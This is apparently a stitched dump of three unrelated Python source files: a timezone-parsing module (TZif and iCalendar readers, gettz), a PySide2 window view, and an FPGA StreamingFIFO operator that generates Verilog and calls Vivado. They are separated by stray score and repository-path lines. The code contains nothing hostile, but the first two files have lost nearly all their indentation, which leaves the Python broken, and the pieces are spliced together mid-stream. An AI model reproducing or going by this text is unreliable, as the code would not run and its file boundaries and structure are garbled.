# begin with the magic characters "TZif" to identify
# them as time zone information files, followed by
# sixteen bytes reserved for future use, followed by
# six four-byte values of type long, written in a
# ``standard'' byte order (the high-order byte
# of the value is written first).
if fileobj.read(4).decode() != "TZif":
raise ValueError("magic not found")
fileobj.read(16)
(
# The number of UTC/local indicators stored in the file.
ttisgmtcnt,
# The number of standard/wall indicators stored in the file.
ttisstdcnt,
# The number of leap seconds for which data is
# stored in the file.
leapcnt,
# The number of "transition times" for which data
# is stored in the file.
timecnt,
# The number of "local time types" for which data
# is stored in the file (must not be zero).
typecnt,
# The number of characters of "time zone
# abbreviation strings" stored in the file.
charcnt,
) = struct.unpack(">6l", fileobj.read(24))
# The above header is followed by tzh_timecnt four-byte
# values of type long, sorted in ascending order.
# These values are written in ``standard'' byte order.
# Each is used as a transition time (as returned by
# time(2)) at which the rules for computing local time
# change.
if timecnt:
self._trans_list = struct.unpack(">%dl" % timecnt,
fileobj.read(timecnt*4))
else:
self._trans_list = []
# Next come tzh_timecnt one-byte values of type unsigned
# char; each one tells which of the different types of
# ``local time'' types described in the file is associated
# with the same-indexed transition time. These values
# serve as indices into an array of ttinfo structures that
# appears next in the file.
if timecnt:
self._trans_idx = struct.unpack(">%dB" % timecnt,
fileobj.read(timecnt))
else:
self._trans_idx = []
# Each ttinfo structure is written as a four-byte value
# for tt_gmtoff of type long, in a standard byte
# order, followed by a one-byte value for tt_isdst
# and a one-byte value for tt_abbrind. In each
# structure, tt_gmtoff gives the number of
# seconds to be added to UTC, tt_isdst tells whether
# tm_isdst should be set by localtime(3), and
# tt_abbrind serves as an index into the array of
# time zone abbreviation characters that follow the
# ttinfo structure(s) in the file.
ttinfo = []
for i in range(typecnt):
ttinfo.append(struct.unpack(">lbb", fileobj.read(6)))
abbr = fileobj.read(charcnt).decode()
# Then there are tzh_leapcnt pairs of four-byte
# values, written in standard byte order; the
# first value of each pair gives the time (as
# returned by time(2)) at which a leap second
# occurs; the second gives the total number of
# leap seconds to be applied after the given time.
# The pairs of values are sorted in ascending order
# by time.
# Not used, for now
if leapcnt:
leap = struct.unpack(">%dl" % (leapcnt*2),
fileobj.read(leapcnt*8))
# Then there are tzh_ttisstdcnt standard/wall
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as standard
# time or wall clock time, and are used when
# a time zone file is used in handling POSIX-style
# time zone environment variables.
if ttisstdcnt:
isstd = struct.unpack(">%db" % ttisstdcnt,
fileobj.read(ttisstdcnt))
# Finally, there are tzh_ttisgmtcnt UTC/local
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as UTC or
# local time, and are used when a time zone file
# is used in handling POSIX-style time zone envi-
# ronment variables.
if ttisgmtcnt:
isgmt = struct.unpack(">%db" % ttisgmtcnt,
fileobj.read(ttisgmtcnt))
# ** Everything has been read **
# Build ttinfo list
self._ttinfo_list = []
for i in range(typecnt):
gmtoff, isdst, abbrind = ttinfo[i]
# Round to full-minutes if that's not the case. Python's
# datetime doesn't accept sub-minute timezones. Check
# http://python.org/sf/1447945 for some information.
gmtoff = (gmtoff+30)//60*60
tti = _ttinfo()
tti.offset = gmtoff
tti.delta = datetime.timedelta(seconds=gmtoff)
tti.isdst = isdst
tti.abbr = abbr[abbrind:abbr.find('\x00', abbrind)]
tti.isstd = (ttisstdcnt > i and isstd[i] != 0)
tti.isgmt = (ttisgmtcnt > i and isgmt[i] != 0)
self._ttinfo_list.append(tti)
# Replace ttinfo indexes for ttinfo objects.
trans_idx = []
for idx in self._trans_idx:
trans_idx.append(self._ttinfo_list[idx])
self._trans_idx = tuple(trans_idx)
# Set standard, dst, and before ttinfos. before will be
# used when a given time is before any transitions,
# and will be set to the first non-dst ttinfo, or to
# the first dst, if all of them are dst.
self._ttinfo_std = None
self._ttinfo_dst = None
self._ttinfo_before = None
if self._ttinfo_list:
if not self._trans_list:
self._ttinfo_std = self._ttinfo_first = self._ttinfo_list[0]
else:
for i in range(timecnt-1, -1, -1):
tti = self._trans_idx[i]
if not self._ttinfo_std and not tti.isdst:
self._ttinfo_std = tti
elif not self._ttinfo_dst and tti.isdst:
self._ttinfo_dst = tti
if self._ttinfo_std and self._ttinfo_dst:
break
else:
if self._ttinfo_dst and not self._ttinfo_std:
self._ttinfo_std = self._ttinfo_dst
for tti in self._ttinfo_list:
if not tti.isdst:
self._ttinfo_before = tti
break
else:
self._ttinfo_before = self._ttinfo_list[0]
# Now fix transition times to become relative to wall time.
#
# I'm not sure about this. In my tests, the tz source file
# is setup to wall time, and in the binary file isstd and
# isgmt are off, so it should be in wall time. OTOH, it's
# always in gmt time. Let me know if you have comments
# about this.
laststdoffset = 0
self._trans_list = list(self._trans_list)
for i in range(len(self._trans_list)):
tti = self._trans_idx[i]
if not tti.isdst:
# This is std time.
self._trans_list[i] += tti.offset
laststdoffset = tti.offset
else:
# This is dst time. Convert to std.
self._trans_list[i] += laststdoffset
self._trans_list = tuple(self._trans_list)
def _find_ttinfo(self, dt, laststd=0):
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
idx = 0
for trans in self._trans_list:
if timestamp < trans:
break
idx += 1
else:
return self._ttinfo_std
if idx == 0:
return self._ttinfo_before
if laststd:
while idx > 0:
tti = self._trans_idx[idx-1]
if not tti.isdst:
return tti
idx -= 1
else:
return self._ttinfo_std
else:
return self._trans_idx[idx-1]
def utcoffset(self, dt):
if not self._ttinfo_std:
return ZERO
return self._find_ttinfo(dt).delta
def dst(self, dt):
if not self._ttinfo_dst:
return ZERO
tti = self._find_ttinfo(dt)
if not tti.isdst:
return ZERO
# The documentation says that utcoffset()-dst() must
# be constant for every dt.
return tti.delta-self._find_ttinfo(dt, laststd=1).delta
# An alternative for that would be:
#
# return self._ttinfo_dst.offset-self._ttinfo_std.offset
#
# However, this class stores historical changes in the
        # dst offset, so I believe that this wouldn't be the right
# way to implement this.
@tzname_in_python2
def tzname(self, dt):
if not self._ttinfo_std:
return None
return self._find_ttinfo(dt).abbr
def __eq__(self, other):
if not isinstance(other, tzfile):
return False
return (self._trans_list == other._trans_list and
self._trans_idx == other._trans_idx and
self._ttinfo_list == other._ttinfo_list)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._filename))
def __reduce__(self):
if not os.path.isfile(self._filename):
raise ValueError("Unpickable %s class" % self.__class__.__name__)
return (self.__class__, (self._filename,))
class tzrange(datetime.tzinfo):
def __init__(self, stdabbr, stdoffset=None,
dstabbr=None, dstoffset=None,
start=None, end=None):
global relativedelta
if not relativedelta:
from dateutil import relativedelta
self._std_abbr = stdabbr
self._dst_abbr = dstabbr
if stdoffset is not None:
self._std_offset = datetime.timedelta(seconds=stdoffset)
else:
self._std_offset = ZERO
if dstoffset is not None:
self._dst_offset = datetime.timedelta(seconds=dstoffset)
elif dstabbr and stdoffset is not None:
self._dst_offset = self._std_offset+datetime.timedelta(hours=+1)
else:
self._dst_offset = ZERO
if dstabbr and start is None:
self._start_delta = relativedelta.relativedelta(
hours=+2, month=4, day=1, weekday=relativedelta.SU(+1))
else:
self._start_delta = start
if dstabbr and end is None:
self._end_delta = relativedelta.relativedelta(
hours=+1, month=10, day=31, weekday=relativedelta.SU(-1))
else:
self._end_delta = end
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
if self._isdst(dt):
return self._dst_abbr
else:
return self._std_abbr
def _isdst(self, dt):
if not self._start_delta:
return False
year = datetime.datetime(dt.year, 1, 1)
start = year+self._start_delta
end = year+self._end_delta
dt = dt.replace(tzinfo=None)
if start < end:
return dt >= start and dt < end
else:
return dt >= start or dt < end
def __eq__(self, other):
if not isinstance(other, tzrange):
return False
return (self._std_abbr == other._std_abbr and
self._dst_abbr == other._dst_abbr and
self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset and
self._start_delta == other._start_delta and
self._end_delta == other._end_delta)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(...)" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzstr(tzrange):
def __init__(self, s):
global parser
if not parser:
from dateutil import parser
self._s = s
res = parser._parsetz(s)
if res is None:
raise ValueError("unknown string format")
# Here we break the compatibility with the TZ variable handling.
# GMT-3 actually *means* the timezone -3.
if res.stdabbr in ("GMT", "UTC"):
res.stdoffset *= -1
# We must initialize it first, since _delta() needs
# _std_offset and _dst_offset set. Use False in start/end
# to avoid building it two times.
tzrange.__init__(self, res.stdabbr, res.stdoffset,
res.dstabbr, res.dstoffset,
start=False, end=False)
if not res.dstabbr:
self._start_delta = None
self._end_delta = None
else:
self._start_delta = self._delta(res.start)
if self._start_delta:
self._end_delta = self._delta(res.end, isend=1)
def _delta(self, x, isend=0):
kwargs = {}
if x.month is not None:
kwargs["month"] = x.month
if x.weekday is not None:
kwargs["weekday"] = relativedelta.weekday(x.weekday, x.week)
if x.week > 0:
kwargs["day"] = 1
else:
kwargs["day"] = 31
elif x.day:
kwargs["day"] = x.day
elif x.yday is not None:
kwargs["yearday"] = x.yday
elif x.jyday is not None:
kwargs["nlyearday"] = x.jyday
if not kwargs:
# Default is to start on first sunday of april, and end
# on last sunday of october.
if not isend:
kwargs["month"] = 4
kwargs["day"] = 1
kwargs["weekday"] = relativedelta.SU(+1)
else:
kwargs["month"] = 10
kwargs["day"] = 31
kwargs["weekday"] = relativedelta.SU(-1)
if x.time is not None:
kwargs["seconds"] = x.time
else:
# Default is 2AM.
kwargs["seconds"] = 7200
if isend:
# Convert to standard time, to follow the documented way
# of working with the extra hour. See the documentation
# of the tzinfo class.
delta = self._dst_offset-self._std_offset
kwargs["seconds"] -= delta.seconds+delta.days*86400
return relativedelta.relativedelta(**kwargs)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
class _tzicalvtzcomp(object):
def __init__(self, tzoffsetfrom, tzoffsetto, isdst,
tzname=None, rrule=None):
self.tzoffsetfrom = datetime.timedelta(seconds=tzoffsetfrom)
self.tzoffsetto = datetime.timedelta(seconds=tzoffsetto)
self.tzoffsetdiff = self.tzoffsetto-self.tzoffsetfrom
self.isdst = isdst
self.tzname = tzname
self.rrule = rrule
class _tzicalvtz(datetime.tzinfo):
def __init__(self, tzid, comps=[]):
self._tzid = tzid
self._comps = comps
self._cachedate = []
self._cachecomp = []
def _find_comp(self, dt):
if len(self._comps) == 1:
return self._comps[0]
dt = dt.replace(tzinfo=None)
try:
return self._cachecomp[self._cachedate.index(dt)]
except ValueError:
pass
lastcomp = None
lastcompdt = None
for comp in self._comps:
if not comp.isdst:
# Handle the extra hour in DST -> STD
compdt = comp.rrule.before(dt-comp.tzoffsetdiff, inc=True)
else:
compdt = comp.rrule.before(dt, inc=True)
if compdt and (not lastcompdt or lastcompdt < compdt):
lastcompdt = compdt
lastcomp = comp
if not lastcomp:
# RFC says nothing about what to do when a given
# time is before the first onset date. We'll look for the
# first standard component, or the first component, if
# none is found.
for comp in self._comps:
if not comp.isdst:
lastcomp = comp
break
else:
                lastcomp = self._comps[0]
self._cachedate.insert(0, dt)
self._cachecomp.insert(0, lastcomp)
if len(self._cachedate) > 10:
self._cachedate.pop()
self._cachecomp.pop()
return lastcomp
def utcoffset(self, dt):
return self._find_comp(dt).tzoffsetto
def dst(self, dt):
comp = self._find_comp(dt)
if comp.isdst:
return comp.tzoffsetdiff
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._find_comp(dt).tzname
def __repr__(self):
return "<tzicalvtz %s>" % repr(self._tzid)
__reduce__ = object.__reduce__
class tzical(object):
def __init__(self, fileobj):
global rrule
if not rrule:
from dateutil import rrule
if isinstance(fileobj, string_types):
self._s = fileobj
fileobj = open(fileobj, 'r') # ical should be encoded in UTF-8 with CRLF
elif hasattr(fileobj, "name"):
self._s = fileobj.name
else:
self._s = repr(fileobj)
self._vtz = {}
self._parse_rfc(fileobj.read())
def keys(self):
return list(self._vtz.keys())
def get(self, tzid=None):
if tzid is None:
keys = list(self._vtz.keys())
if len(keys) == 0:
raise ValueError("no timezones defined")
elif len(keys) > 1:
raise ValueError("more than one timezone available")
tzid = keys[0]
return self._vtz.get(tzid)
def _parse_offset(self, s):
s = s.strip()
if not s:
raise ValueError("empty offset")
if s[0] in ('+', '-'):
signal = (-1, +1)[s[0]=='+']
s = s[1:]
else:
signal = +1
if len(s) == 4:
return (int(s[:2])*3600+int(s[2:])*60)*signal
elif len(s) == 6:
return (int(s[:2])*3600+int(s[2:4])*60+int(s[4:]))*signal
else:
raise ValueError("invalid offset: "+s)
def _parse_rfc(self, s):
lines = s.splitlines()
if not lines:
raise ValueError("empty string")
# Unfold
i = 0
while i < len(lines):
line = lines[i].rstrip()
if not line:
del lines[i]
elif i > 0 and line[0] == " ":
lines[i-1] += line[1:]
del lines[i]
else:
i += 1
tzid = None
comps = []
invtz = False
comptype = None
for line in lines:
if not line:
continue
name, value = line.split(':', 1)
parms = name.split(';')
if not parms:
raise ValueError("empty property name")
name = parms[0].upper()
parms = parms[1:]
if invtz:
if name == "BEGIN":
if value in ("STANDARD", "DAYLIGHT"):
# Process component
pass
else:
raise ValueError("unknown component: "+value)
comptype = value
founddtstart = False
tzoffsetfrom = None
tzoffsetto = None
rrulelines = []
tzname = None
elif name == "END":
if value == "VTIMEZONE":
if comptype:
raise ValueError("component not closed: "+comptype)
if not tzid:
raise ValueError("mandatory TZID not found")
if not comps:
raise ValueError("at least one component is needed")
# Process vtimezone
self._vtz[tzid] = _tzicalvtz(tzid, comps)
invtz = False
elif value == comptype:
if not founddtstart:
raise ValueError("mandatory DTSTART not found")
if tzoffsetfrom is None:
raise ValueError("mandatory TZOFFSETFROM not found")
if tzoffsetto is None:
raise ValueError("mandatory TZOFFSETFROM not found")
# Process component
rr = None
if rrulelines:
rr = rrule.rrulestr("\n".join(rrulelines),
compatible=True,
ignoretz=True,
cache=True)
comp = _tzicalvtzcomp(tzoffsetfrom, tzoffsetto,
(comptype == "DAYLIGHT"),
tzname, rr)
comps.append(comp)
comptype = None
else:
raise ValueError("invalid component end: "+value)
elif comptype:
if name == "DTSTART":
rrulelines.append(line)
founddtstart = True
elif name in ("RRULE", "RDATE", "EXRULE", "EXDATE"):
rrulelines.append(line)
elif name == "TZOFFSETFROM":
if parms:
raise ValueError("unsupported %s parm: %s "%(name, parms[0]))
tzoffsetfrom = self._parse_offset(value)
elif name == "TZOFFSETTO":
if parms:
raise ValueError("unsupported TZOFFSETTO parm: "+parms[0])
tzoffsetto = self._parse_offset(value)
elif name == "TZNAME":
if parms:
raise ValueError("unsupported TZNAME parm: "+parms[0])
tzname = value
elif name == "COMMENT":
pass
else:
raise ValueError("unsupported property: "+name)
else:
if name == "TZID":
if parms:
raise ValueError("unsupported TZID parm: "+parms[0])
tzid = value
elif name in ("TZURL", "LAST-MODIFIED", "COMMENT"):
pass
else:
raise ValueError("unsupported property: "+name)
elif name == "BEGIN" and value == "VTIMEZONE":
tzid = None
comps = []
invtz = True
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
if sys.platform != "win32":
TZFILES = ["/etc/localtime", "localtime"]
TZPATHS = ["/usr/share/zoneinfo", "/usr/lib/zoneinfo", "/etc/zoneinfo"]
else:
TZFILES = []
TZPATHS = []
def gettz(name=None):
tz = None
if not name:
try:
name = os.environ["TZ"]
except KeyError:
pass
if name is None or name == ":":
for filepath in TZFILES:
if not os.path.isabs(filepath):
filename = filepath
for path in TZPATHS:
filepath = os.path.join(path, filename)
if os.path.isfile(filepath):
break
else:
continue
if os.path.isfile(filepath):
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = tzlocal()
else:
if name.startswith(":"):
            name = name[1:]  # strip the leading ":" used by some TZ settings
if os.path.isabs(name):
if os.path.isfile(name):
tz = tzfile(name)
else:
tz = None
else:
for path in TZPATHS:
filepath = os.path.join(path, name)
if not os.path.isfile(filepath):
filepath = filepath.replace(' ', '_')
if not os.path.isfile(filepath):
continue
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = None
if tzwin:
try:
tz = tzwin(name)
except OSError:
pass
if not tz:
from dateutil.zoneinfo import gettz
tz = gettz(name)
if not tz:
for c in name:
# name must have at least one offset to be a tzstr
if c in "0123456789":
try:
tz = tzstr(name)
except ValueError:
pass
break
else:
if name in ("GMT", "UTC"):
tz = tzutc()
elif name in time.tzname:
tz = tzlocal()
return tz
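# Illustrative usage sketch (assumes zoneinfo files are installed under one of TZPATHS):
#   eastern = gettz("America/New_York")
#   datetime.datetime(2003, 10, 26, 1, 30, tzinfo=eastern)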
# vim:ts=4:sw=4:et
| 2.828125 | 3 |
example/first_example/window/inputWindow/view.py | suuperhu/Pyside2MVCFramework | 1 | 3308 | # -*- coding: utf-8 -*-
"""
# @SoftwareIDE : PyCharm2020Pro
# @ProjectName : PySide2MVCFramework
# @FileName : view.py
# @Author : 胡守杰
# @Email : <EMAIL>
# @ZhFileDescription :
# @EnFileDescription :
"""
import os
from pyside2mvcframework.core.view import View
from conf.global_settings import BASE_PATH
class InputWindowView(View):
uiFilePath = os.path.join(BASE_PATH, "src\\window\\inputWindow\\inputWindow.ui")
if __name__ == '__main__':
print("unit test from {filename}".format(filename=__file__))
import sys
from PySide2.QtWidgets import QApplication
app = QApplication(sys.argv)
view = InputWindowView().birth()
view.show()
sys.exit(app.exec_())
| 2.078125 | 2 |
src/finn/custom_op/fpgadataflow/streamingfifo.py | AlexMontgomerie/finn | 283 | 3309 | # Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import numpy as np
from shutil import copy
import subprocess
import math
import warnings
from finn.custom_op.fpgadataflow.hlscustomop import HLSCustomOp
from finn.core.datatype import DataType
from onnx import TensorProto, helper
from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy
from . import templates
class StreamingFIFO(HLSCustomOp):
def __init__(self, onnx_node):
super().__init__(onnx_node)
self.strm_fifo_wrapper = templates.strm_fifo_wrapper
def get_nodeattr_types(self):
my_attrs = {
# FIFO depth
"depth": ("i", True, 0),
# folded shape of input/output
"folded_shape": ("ints", True, []),
# FINN DataTypes for inputs/outputs
"dataType": ("s", True, ""),
# Toggle between hls or IPI implementation
# rtl - use the hls generated IP during stitching
# vivado - use the AXI Infrastructure FIFO
"impl_style": ("s", False, "rtl", {"rtl", "vivado"}),
# FPGA resource type for FIFOs when impl_style is vivado
# auto -- let Vivado decide
# block -- use BRAM
# distributed -- use LUTRAM
# ultra -- use URAM (on UltraScale+)
"ram_style": (
"s",
False,
"auto",
{"auto", "block", "distributed", "ultra"},
),
}
my_attrs.update(super().get_nodeattr_types())
return my_attrs
def make_shape_compatible_op(self, model):
exp_ishape = self.get_normal_input_shape()
oshape = self.get_normal_output_shape()
ishape = tuple(model.get_tensor_shape(self.onnx_node.input[0]))
        assert ishape == tuple(exp_ishape), "Unexpected input shape for StreamingFIFO."
# implement tensor with correct shape
values = np.random.randn(*oshape).astype(np.float32)
return helper.make_node(
"Constant",
inputs=[],
outputs=[self.onnx_node.output[0]],
value=helper.make_tensor(
name="const_tensor",
data_type=TensorProto.FLOAT,
dims=values.shape,
vals=values.flatten().astype(float),
),
)
def infer_node_datatype(self, model):
node = self.onnx_node
idt = model.get_tensor_datatype(node.input[0])
if idt != self.get_input_datatype():
warn_str = "inputDataType changing for %s: %s -> %s " % (
node.name,
str(self.get_input_datatype()),
str(idt),
)
warnings.warn(warn_str)
self.set_nodeattr("dataType", idt.name)
# data type stays the same
model.set_tensor_datatype(node.output[0], idt)
def verify_node(self):
pass
def get_verilog_top_module_name(self):
"Return the Verilog top module name for this node."
node = self.onnx_node
prefixed_top_name = "%s" % (node.name)
return prefixed_top_name
def code_generation_ipgen(self, model, fpgapart, clk):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
os.makedirs(verilog_dir)
# copy Q_srl.v from finn-rtllib to verilog directory
memstream_dir = "/workspace/finn/finn-rtllib/memstream/hdl/"
Q_file = os.path.join(memstream_dir, "Q_srl.v")
copy(Q_file, verilog_dir)
# empty code gen dictionary for new entries
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
self.code_gen_dict["$LAYER_NAME$"] = [
"{}_{}".format(self.onnx_node.name, self.onnx_node.name)
]
# make instream width a multiple of 8 for axi interface
in_width = self.get_instream_width_padded()
count_width = int(self.get_nodeattr("depth") - 1).bit_length()
self.code_gen_dict["$COUNT_RANGE$"] = ["[{}:0]".format(count_width - 1)]
self.code_gen_dict["$IN_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$OUT_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$WIDTH$"] = [str(in_width)]
self.code_gen_dict["$DEPTH$"] = [str(self.get_nodeattr("depth"))]
template = self.strm_fifo_wrapper
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "{}.v".format(self.onnx_node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def ipgen_singlenode_code(self):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
# prepare the IP packaging tcl template
template = templates.ip_package_tcl
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
# note: setting the root dir as absolute can cause path problems
# the ipgen script will be invoked from the sources dir so root_dir=. is OK
self.code_gen_dict["$VERILOG_DIR$"] = ["."]
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "package_ip.tcl"), "w")
f.write(template)
f.close()
# create a shell script and call Vivado to invoke the IP pkg script
make_project_sh = verilog_dir + "/make_ip.sh"
working_dir = os.environ["PWD"]
with open(make_project_sh, "w") as f:
f.write("#!/bin/bash \n")
f.write("cd {}\n".format(verilog_dir))
f.write("vivado -mode batch -source package_ip.tcl\n")
f.write("cd {}\n".format(working_dir))
bash_command = ["bash", make_project_sh]
process_compile = subprocess.Popen(bash_command, stdout=subprocess.PIPE)
process_compile.communicate()
# set ipgen_path and ip_path to point to the new packaged IP
self.set_nodeattr("ipgen_path", verilog_dir)
self.set_nodeattr("ip_path", verilog_dir)
vlnv = "xilinx.com:hls:%s:1.0" % (self.onnx_node.name)
self.set_nodeattr("ip_vlnv", vlnv)
self.code_gen_dict.clear()
def get_normal_input_shape(self):
depth = self.get_nodeattr("depth")
# depth has to be between 2 and 256 with the current
# StreamingFIFO implementation
assert depth >= 2, """Depth is too low"""
if depth > 256 and self.get_nodeattr("impl_style") == "rtl":
warnings.warn(
"Depth is high, set between 2 and 256 for efficient SRL implementation"
)
# derive normal shape from folded shape
# StreamingFIFOs are inserted in between fpgadataflow nodes
# the folded shape could be for example (1, nf, pe)
# with nf (neuron folding): mh // pe
# the normal input shape is in this case (1, mh)
# so to achieve this the two inner dimensions are multiplied
# and together with all previous dimensions
# this gives the normal input shape
folded_shape = self.get_nodeattr("folded_shape")
# extract inner dimension
inner_dim = folded_shape[-1]
# multiply with the next inner dimension
folding_factor = folded_shape[-2] * inner_dim
normal_ishape = []
# create the normal_ishape
for i in range(len(folded_shape) - 2):
normal_ishape.append(folded_shape[i])
normal_ishape.append(folding_factor)
return normal_ishape
def get_normal_output_shape(self):
return self.get_normal_input_shape()
def get_folded_input_shape(self):
return self.get_nodeattr("folded_shape")
def get_folded_output_shape(self):
return self.get_nodeattr("folded_shape")
def get_instream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def get_outstream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def execute_node(self, context, graph):
mode = self.get_nodeattr("exec_mode")
node = self.onnx_node
inp = context[node.input[0]]
exp_shape = self.get_normal_input_shape()
if mode == "cppsim":
output = inp
output = np.asarray([output], dtype=np.float32).reshape(*exp_shape)
context[node.output[0]] = output
elif mode == "rtlsim":
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
# create a npy file for the input of the node
assert (
str(inp.dtype) == "float32"
), """Input datatype is
not float32 as expected."""
expected_inp_shape = self.get_folded_input_shape()
reshaped_input = inp.reshape(expected_inp_shape)
if DataType[self.get_nodeattr("dataType")] == DataType.BIPOLAR:
# store bipolar activations as binary
reshaped_input = (reshaped_input + 1) / 2
export_idt = DataType.BINARY
else:
export_idt = DataType[self.get_nodeattr("dataType")]
# make copy before saving the array
reshaped_input = reshaped_input.copy()
np.save(os.path.join(code_gen_dir, "input_0.npy"), reshaped_input)
sim = self.get_rtlsim()
nbits = self.get_instream_width()
inp = npy_to_rtlsim_input(
"{}/input_0.npy".format(code_gen_dir), export_idt, nbits
)
super().reset_rtlsim(sim)
super().toggle_clk(sim)
output = self.rtlsim(sim, inp)
odt = DataType[self.get_nodeattr("dataType")]
target_bits = odt.bitwidth()
packed_bits = self.get_outstream_width()
out_npy_path = "{}/output.npy".format(code_gen_dir)
out_shape = self.get_folded_output_shape()
rtlsim_output_to_npy(
output, out_npy_path, odt, out_shape, packed_bits, target_bits
)
# load and reshape output
output = np.load(out_npy_path)
oshape = self.get_normal_output_shape()
output = np.asarray([output], dtype=np.float32).reshape(*oshape)
context[node.output[0]] = output
else:
raise Exception(
"""Invalid value for attribute exec_mode! Is currently set to: {}
has to be set to one of the following value ("cppsim", "rtlsim")""".format(
mode
)
)
def get_number_output_values(self):
folded_oshape = self.get_folded_output_shape()
return np.prod(folded_oshape[:-1])
def global_includes(self):
pass
def defines(self, var):
pass
def read_npy_data(self):
pass
def strm_decl(self):
pass
def docompute(self):
pass
def dataoutstrm(self):
pass
def save_as_npy(self):
pass
def blackboxfunction(self):
pass
def pragmas(self):
pass
def code_generation_ipi(self):
impl_style = self.get_nodeattr("impl_style")
if impl_style == "rtl":
return super().code_generation_ipi()
elif impl_style == "vivado":
cmd = []
node_name = self.onnx_node.name
depth = self.get_nodeattr("depth")
ram_style = self.get_nodeattr("ram_style")
# create a hierarchy for this layer, with the same port names
clk_name = self.get_verilog_top_module_intf_names()["clk"][0]
rst_name = self.get_verilog_top_module_intf_names()["rst"][0]
dout_name = self.get_verilog_top_module_intf_names()["m_axis"][0][0]
din_name = self.get_verilog_top_module_intf_names()["s_axis"][0][0]
cmd.append("create_bd_cell -type hier %s" % node_name)
cmd.append("create_bd_pin -dir I -type clk /%s/%s" % (node_name, clk_name))
cmd.append("create_bd_pin -dir I -type rst /%s/%s" % (node_name, rst_name))
cmd.append(
"create_bd_intf_pin -mode Master "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s"
% (node_name, dout_name)
)
cmd.append(
"create_bd_intf_pin -mode Slave "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s" % (node_name, din_name)
)
            # instantiate and configure the AXI Stream FIFO
cmd.append(
"create_bd_cell -type ip "
"-vlnv xilinx.com:ip:axis_data_fifo:2.0 /%s/fifo" % node_name
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_DEPTH {%d}] "
"[get_bd_cells /%s/fifo]" % (depth, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_MEMORY_TYPE {%s}] "
"[get_bd_cells /%s/fifo]" % (ram_style, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.TDATA_NUM_BYTES {%d}] "
"[get_bd_cells /%s/fifo]"
% (np.ceil(self.get_outstream_width() / 8), node_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/M_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, dout_name)
)
cmd.append(
